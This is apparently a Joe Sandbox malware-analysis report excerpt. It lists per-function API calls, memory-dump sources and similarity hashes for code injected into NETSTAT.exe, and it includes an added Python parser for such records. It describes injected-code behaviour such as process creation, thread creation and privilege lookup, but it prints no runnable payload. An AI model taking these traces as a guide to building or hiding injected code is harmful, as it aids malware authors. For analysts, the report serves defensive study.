• Instruction Fuzzy Hash: D8E012B6200218ABDB14EF99DC45EA777ACAF88654F118558BA085B282C630F910CAB0

Control-flow Graph

Basic blocks (id: address range, calls -> successor blocks):
• 570: 52a630-52a661, call 52af20, RtlFreeHeap (single block)
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00513AF8), ref: 0052A65D
Strings
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction ID: c2abf2f684652490821c7029452c9fbbff3ec428229fc5240d917d9db8ff568f
• Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction Fuzzy Hash: 2CE04FB52002146BD714DF59DC49EA777ACEF88750F014554FD0857241D630F910CAF0

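
Every block in this function listing has the same fixed layout: an APIs list with call-site references, the memory dump the function was lifted from (with whether that region is backed by a PE image), and a Similarity section in which the API String ID is shared by functions with the same API-and-string set while the Opcode ID is distinct per function. The Python parser below is an added example and is not part of the Joe Sandbox report or its tooling; it turns such records into structured data and groups them, so that the two Sleep(000007D0) functions above fall into one API String ID group as near-duplicate copies of a single routine, and the Sleep argument decodes to 2000 ms. Field names and helper functions are this example's own choices; the embedded SAMPLE text is copied, abridged, from records on this page.

```python
"""Parse Joe Sandbox per-function records (the 'APIs' / 'Memory Dump Source' / 'Similarity'
blocks in this listing) into structured data, so hundreds of such functions can be triaged by
API, string and memory region instead of being read one record at a time. Added example, not
part of the Joe Sandbox report or its tooling; field names and helpers are this example's own.
SAMPLE is copied (abridged) from records on this page."""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass, field

API_CALL_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^Source File:\s*\S+,\s*Offset:\s*([0-9A-Fa-f]+),\s*based on PE:\s*(true|false)$")

@dataclass
class ApiCall:
    module: str
    name: str
    args: tuple  # argument text as the report prints it (hex; '?' = not recovered)
    ref: int     # call-site address

@dataclass
class FunctionRecord:
    api_calls: list = field(default_factory=list)
    dump_offset: int | None = None   # base of the memory dump the function came from
    based_on_pe: bool | None = None  # False: region not backed by a PE image on disk
    has_yara_section: bool = False   # a 'Yara matches' block accompanied the record
    api_id: str = ""
    strings: tuple = ()              # 'String ID' split on the report's '$' separator
    api_string_id: str = ""          # same for every function with this API+string set
    opcode_id: str = ""              # per-function identifier, distinct for each copy

def parse_records(text: str) -> list[FunctionRecord]:
    """One record per block; 'Instruction Fuzzy Hash' closes a block. Lines the parser
    does not know (headers, snapshot names, flattened CFG dumps) are skipped."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if m := API_CALL_RE.match(line):
            name, module, args, ref = m.groups()
            cur.api_calls.append(ApiCall(module, name, tuple(a.strip() for a in args.split(",")), int(ref, 16)))
        elif m := SOURCE_RE.match(line):
            cur.dump_offset, cur.based_on_pe = int(m.group(1), 16), m.group(2) == "true"
        elif line == "Yara matches":
            cur.has_yara_section = True
        elif ":" in line:
            key, value = (p.strip() for p in line.split(":", 1))
            if key == "API ID":
                cur.api_id = value
            elif key == "String ID":
                cur.strings = tuple(s for s in value.split("$") if s)
            elif key == "API String ID":
                cur.api_string_id = value
            elif key == "Opcode ID":
                cur.opcode_id = value
            elif key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = FunctionRecord()
    return records

def functions_by_api_string_id(records: list[FunctionRecord]) -> dict[str, list[str]]:
    """Opcode IDs grouped by API String ID: several under one key are near-duplicate
    copies of one routine (same API and string set, slightly different code)."""
    groups = defaultdict(list)
    for r in records:
        groups[r.api_string_id].append(r.opcode_id)
    return dict(groups)

def strings_in_non_pe_regions(records: list[FunctionRecord]) -> set[str]:
    """Strings referenced by code not backed by a PE image, i.e. the injected payload."""
    return {s for r in records if r.based_on_pe is False for s in r.strings}

def sleep_durations_ms(records: list[FunctionRecord]) -> list[int]:
    """Sleep() arguments decoded from the report's hex into milliseconds."""
    return sorted({int(c.args[0], 16) for r in records for c in r.api_calls if c.name == "Sleep"})

SAMPLE = """\
• Sleep.KERNELBASE(000007D0), ref: 005290E8
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Yara matches
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 67dfdab9b289bf323b02092197777028d9790be4d6a7d0ccd77969d3ff99cbb0
• Instruction Fuzzy Hash: A331C4B2500755BBC724DF65D889FA7BBB8BF88B00F00841DF62A6B285D730B550CBA4
• Sleep.KERNELBASE(000007D0), ref: 005290E8
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 8ce54d0030ea9711474f0c820136d5c0a83954125378267c1b79227ddecc5476
• Instruction Fuzzy Hash: B231F2B2500356ABD714DF64D889FA7BBB8BF88700F00802DF6296B385D770A560CBA4
• Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a6d692e42eb6982e621a0a9b322a4dbb20ba2777cd6c47753a4dc5cea26021cd
• Instruction Fuzzy Hash: F6900231A0550803E500B1584614706100587D5201F65D412A0429568D87958A5165A6
"""
```

Run over the full report text as extracted, the same helpers separate the non-PE-backed region at 00510000 (where the Yara matches are reported) from the PE-backed region at 03110000, and collapse the many per-function entries into a much shorter list of distinct API-and-string combinations; lines the parser does not recognise, including the flattened control-flow-graph dumps, are skipped rather than breaking the parse.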
                                                                                                                                                                            APIs
                                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0051836A
                                                                                                                                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0051838B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessagePostThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1836367815-0
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0051836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0051838B
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0051AD52
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0052A6F4
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
APIs
• CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0052A6F4
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateInternalProcess
• String ID:
• API String ID: 2186235152-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0051F040,?,?,00000000), ref: 005291AC
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0051F040,?,?,00000000), ref: 005291AC
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0051F1C2,0051F1C2,?,00000000,?,?), ref: 0052A7C0
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0051F1C2,0051F1C2,?,00000000,?,?), ref: 0052A7C0
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,0051F1C2,0051F1C2,?,00000000,?,?), ref: 0052A7C0
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
APIs
• SetErrorMode.KERNELBASE(00008003,?,00518D14,?), ref: 0051F6EB
Memory Dump Source
• Source File: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, Offset: 00510000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_510000_NETSTAT.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
                                                                                                                                                                            • Opcode ID: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                            • Instruction ID: 299c6c8ab5443beee5b5a92afbe959ee05103c0c54d69cbc75789f109dfd613a
                                                                                                                                                                            • Opcode Fuzzy Hash: a2d4a72b799ecba535e6209a82b178d001bd83fc2549ccaf7422d872a4b8c7e9
                                                                                                                                                                            • Instruction Fuzzy Hash: F8D05E626503042BF610FAA89C07F66378C6B55B00F490074F948972C3D954E4004565
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4130129795.0000000003110000.00000040.00001000.00020000.00000000.sdmp, Offset: 03110000, based on PE: true
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.0000000003239000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.000000000323D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            • Associated: 00000005.00000002.4130129795.00000000032AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_3110000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: 77d44772eb835ffa292a989e0d54087c192411f4afdbadca79ed700bce5edfbc
                                                                                                                                                                            • Instruction ID: f27ec2acba99d4b6aa31178cb800758114bb26cf801e7f66b342061275760c13
                                                                                                                                                                            • Opcode Fuzzy Hash: 77d44772eb835ffa292a989e0d54087c192411f4afdbadca79ed700bce5edfbc
                                                                                                                                                                            • Instruction Fuzzy Hash: C9B09B71D019C5C7EE11F7604708717790467D5701F29C462D2034645E4739C1D1E579
                                                                                                                                                                            APIs
                                                                                                                                                                            • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 0068177B
                                                                                                                                                                            • SetThreadUILanguage.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000), ref: 0068178A
                                                                                                                                                                              • Part of subcall function 00686139: __iob_func.MSVCRT ref: 0068613E
                                                                                                                                                                              • Part of subcall function 00684662: fgetpos.MSVCRT ref: 00684697
                                                                                                                                                                              • Part of subcall function 00684662: _fileno.MSVCRT ref: 006846B1
                                                                                                                                                                              • Part of subcall function 00684662: _setmode.MSVCRT ref: 006846B9
                                                                                                                                                                              • Part of subcall function 00684662: fwprintf.MSVCRT ref: 006846C5
                                                                                                                                                                              • Part of subcall function 00684662: fgetpos.MSVCRT ref: 006846DE
                                                                                                                                                                              • Part of subcall function 00684662: _fileno.MSVCRT ref: 006846F8
                                                                                                                                                                              • Part of subcall function 00684662: _setmode.MSVCRT ref: 00684700
                                                                                                                                                                              • Part of subcall function 00684662: _fileno.MSVCRT ref: 00684710
                                                                                                                                                                              • Part of subcall function 00684662: _write.MSVCRT ref: 00684718
                                                                                                                                                                            • WSAStartup.WS2_32(00000101,?), ref: 006817C3
                                                                                                                                                                            • exit.MSVCRT ref: 006817EC
                                                                                                                                                                            • _strupr.MSVCRT ref: 00681812
                                                                                                                                                                            • sscanf_s.MSVCRT ref: 00681920
                                                                                                                                                                            • toupper.MSVCRT ref: 00681946
                                                                                                                                                                            • toupper.MSVCRT ref: 00681963
                                                                                                                                                                            • toupper.MSVCRT ref: 00681982
                                                                                                                                                                            • toupper.MSVCRT ref: 0068199F
                                                                                                                                                                            • toupper.MSVCRT ref: 006819BC
                                                                                                                                                                            • toupper.MSVCRT ref: 006819D6
                                                                                                                                                                            • toupper.MSVCRT ref: 006819F0
                                                                                                                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001100,00000000,000002E4,00000000,?,00000000,00000000), ref: 00681B1D
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00681B36
                                                                                                                                                                              • Part of subcall function 0068485E: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000900,?,00000000,000000FF,00000000,00000000,00000001,00000001,?,00682E0C,00000000,00002718,?,00000000,000000FF), ref: 00684885
                                                                                                                                                                              • Part of subcall function 0068485E: LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(000000FF,?,00682E0C,00000000,00002718,?,00000000,000000FF), ref: 0068489D
                                                                                                                                                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(?), ref: 00681C61
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: toupper$_fileno$FormatFreeLocalMessage_setmodefgetpos$HeapInformationLanguageSleepStartupThread__iob_func_strupr_writeexitfwprintfsscanf_s
                                                                                                                                                                            • String ID: $%lu$ICMP$ICMPV6$IPV6$TCP$TCPV6$UDP$UDPV6
                                                                                                                                                                            • API String ID: 2214462882-2943784616
                                                                                                                                                                            • Opcode ID: ace3b1188f4e10b36c14f9c78dff2cd49518ae83b9ca65593128f6f01a6cafa5
                                                                                                                                                                            • Instruction ID: ef7c6e7b4bd9df087534cfe5133d2b30010e6d8e47abf3b8728edb9f87d26f9c
                                                                                                                                                                            • Opcode Fuzzy Hash: ace3b1188f4e10b36c14f9c78dff2cd49518ae83b9ca65593128f6f01a6cafa5
                                                                                                                                                                            • Instruction Fuzzy Hash: 23F1C2705483419FDB286B2498597BA7BEFAF4B710F540A1EF5C69E291DB34C8838B06
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,00000000,000000FF), ref: 0068217A
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068228D
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068229D
                                                                                                                                                                            • InternalGetTcpTableWithOwnerModule.IPHLPAPI(?,00000000,00000000), ref: 006822E2
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682324
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682335
                                                                                                                                                                            • InternalGetTcpTable2.IPHLPAPI(?,00000000,00000000), ref: 00682377
                                                                                                                                                                            • htons.WS2_32(?), ref: 006823B5
                                                                                                                                                                            • htons.WS2_32(?), ref: 006823C6
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00682406
                                                                                                                                                                            • InternalGetBoundTcpEndpointTable.IPHLPAPI(?,00000000,00000000), ref: 00682419
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068243D
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068244E
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0068248A
                                                                                                                                                                            • htons.WS2_32(?), ref: 006824EA
                                                                                                                                                                            • htons.WS2_32(?), ref: 006824FA
                                                                                                                                                                            • InternalGetTcp6TableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00682540
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682582
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682593
                                                                                                                                                                            • InternalGetTcp6Table2.IPHLPAPI(00000000,00000000,00000000), ref: 006825D1
                                                                                                                                                                            • htons.WS2_32(?), ref: 0068260F
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682620
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00682660
                                                                                                                                                                            • InternalGetBoundTcp6EndpointTable.IPHLPAPI(?,00000000,00000000), ref: 00682677
                                                                                                                                                                            • htons.WS2_32(?), ref: 006826AB
                                                                                                                                                                            • htons.WS2_32(?), ref: 006826BC
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 006826FC
                                                                                                                                                                            • InternalGetUdpTableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00682718
                                                                                                                                                                            • htons.WS2_32(?), ref: 00682748
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 00682780
                                                                                                                                                                            • InternalGetUdp6TableWithOwnerModule.IPHLPAPI(00000000,00000000,00000000), ref: 00682799
                                                                                                                                                                            • htons.WS2_32(?), ref: 006827C9
                                                                                                                                                                            • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 006827FE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: htons$Internal$Heap$FreeTable$ModuleOwnerWith$Tcp6$BoundEndpointTable2$ProcessUdp6
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1690255193-0
                                                                                                                                                                            • Opcode ID: 25a8d0a3b5e43e3df4cc5f6484d4215a6a67c7d05ea5ae64a3d6ac938a1fd3d5
                                                                                                                                                                            • Instruction ID: 310a79b0ee7edb3a7f2e1e6832439f8fde46a5ef353d5e51f0ad97e951040f0b
                                                                                                                                                                            • Opcode Fuzzy Hash: 25a8d0a3b5e43e3df4cc5f6484d4215a6a67c7d05ea5ae64a3d6ac938a1fd3d5
                                                                                                                                                                            • Instruction Fuzzy Hash: D9326971D00215EFCB25EFA5C894AEEB7F2FF48301F24821AE955A7340D738A941CB60
                                                                                                                                                                            APIs
                                                                                                                                                                            • fprintf.MSVCRT ref: 00684BF0
                                                                                                                                                                            • GetUdpStatisticsEx.IPHLPAPI(00000008,00000002), ref: 00684C1E
                                                                                                                                                                              • Part of subcall function 00686139: __iob_func.MSVCRT ref: 0068613E
                                                                                                                                                                            • GetTcpStatisticsEx.IPHLPAPI(00000008,00000017), ref: 00685161
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Statistics$__iob_funcfprintf
                                                                                                                                                                            • String ID: %s $%2d.$%3d.$%d.$ReadTable: type = %d$value=%8d oid=
                                                                                                                                                                            • API String ID: 2761504588-3074728934
                                                                                                                                                                            • Opcode ID: 38e989ff59e4fc39afd2fff49783efe54ad4f01a4953148b87afc1b136960d99
                                                                                                                                                                            • Instruction ID: b96fa34526f2f172c4b2c4fcfc1b49f1af22f95261ee2e13716572798b6c8b05
                                                                                                                                                                            • Opcode Fuzzy Hash: 38e989ff59e4fc39afd2fff49783efe54ad4f01a4953148b87afc1b136960d99
                                                                                                                                                                            • Instruction Fuzzy Hash: 41029031D04206DFCB24EFA8D949AAEBBB7BB05300F24435AE546AB741DF719D42CB90
                                                                                                                                                                            APIs
                                                                                                                                                                            • memset.MSVCRT ref: 0068391B
                                                                                                                                                                            • OpenProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-1(00000410,00000000,?,00000000,?,00000000), ref: 00683937
                                                                                                                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 00683B39
                                                                                                                                                                            • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 00683B44
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Free$LibraryLocalOpenProcessmemset
                                                                                                                                                                            • String ID: I_QueryTagInformation$\advapi32.dll$rundll32.exe$svchost.exe$Dh
                                                                                                                                                                            • API String ID: 276527812-598021986
                                                                                                                                                                            • Opcode ID: 62453b7b78fdd2c15e45ffea5b803f05b60b5905e20cbc55cefbe00e834c9477
                                                                                                                                                                            • Instruction ID: 698ab88379c6003cc9c62f8c3e9e4ec79bb0a512c83bda147362b428d76d6431
                                                                                                                                                                            • Opcode Fuzzy Hash: 62453b7b78fdd2c15e45ffea5b803f05b60b5905e20cbc55cefbe00e834c9477
                                                                                                                                                                            • Instruction Fuzzy Hash: C561D5B19002246FEB64BF24DC49EBAB36FDB44710F1043A9F51AA7281EE719E84CB14
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,00000000,?,?,?,?,?,?,00682809), ref: 00681D15
                                                                                                                                                                            • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,00682809), ref: 00681D1C
                                                                                                                                                                            • AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,?,00000010,00000000,00000000), ref: 00681D48
                                                                                                                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00681D56
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                                                                            • String ID: (h
                                                                                                                                                                            • API String ID: 3874597930-4003767645
                                                                                                                                                                            • Opcode ID: b7e497c7eb4abc566b20386025dfa36f79d8279631f91a7b38568625414dbb29
                                                                                                                                                                            • Instruction ID: c05437c3dce5ff51c9eb27bb943902e2b4094578f22f12c8b58e1c186b292ee5
                                                                                                                                                                            • Opcode Fuzzy Hash: b7e497c7eb4abc566b20386025dfa36f79d8279631f91a7b38568625414dbb29
                                                                                                                                                                            • Instruction Fuzzy Hash: EB01FB70A01219BFDB10AFA5DC09AEFBFBDEF09750F504259E905A7250CB709A05CBA5
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000028,?,0000274F,?,?,?,?,?,?,0068222F), ref: 00681CA2
                                                                                                                                                                            • OpenProcessToken.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,?,?,?,0068222F), ref: 00681CA9
                                                                                                                                                                            • AdjustTokenPrivileges.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000000,00000001,00000010,00000000,00000000), ref: 00681CD9
                                                                                                                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 00681CE7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleOpenPrivileges
                                                                                                                                                                            • String ID: /"h
                                                                                                                                                                            • API String ID: 3874597930-680228741
                                                                                                                                                                            • Opcode ID: a6f1e543ea54a1861584f25101b18cd98458f82a091f3877bec40599ee8effb6
                                                                                                                                                                            • Instruction ID: 0fa8b4792b1c1b644923cadd6b7bb5874609172255ab19b196e9572dc83f1614
                                                                                                                                                                            • Opcode Fuzzy Hash: a6f1e543ea54a1861584f25101b18cd98458f82a091f3877bec40599ee8effb6
                                                                                                                                                                            • Instruction Fuzzy Hash: F301FF70901219ABDB10AFA5DC09AEFBFBDFF09750F504159A501E7250CB748A05CBA1
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00685D66,00681000), ref: 00685C37
                                                                                                                                                                            • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(f]h,?,00685D66,00681000), ref: 00685C40
                                                                                                                                                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00685D66,00681000), ref: 00685C4B
                                                                                                                                                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00685D66,00681000), ref: 00685C52
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000005.00000002.4129159604.0000000000680000.00000040.80000000.00040000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_5_2_680000_NETSTAT.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                            • String ID: f]h
                                                                                                                                                                            • API String ID: 3231755760-4284982515
                                                                                                                                                                            • Opcode ID: 5d4d73faed2c7e3f98ab71b3fae522d8f7ab8fb248726729c9b4ea922b93a74b
                                                                                                                                                                            • Instruction ID: 081f604235563296232537306dce7e1499f37e82c946da67859d8f93b907008b
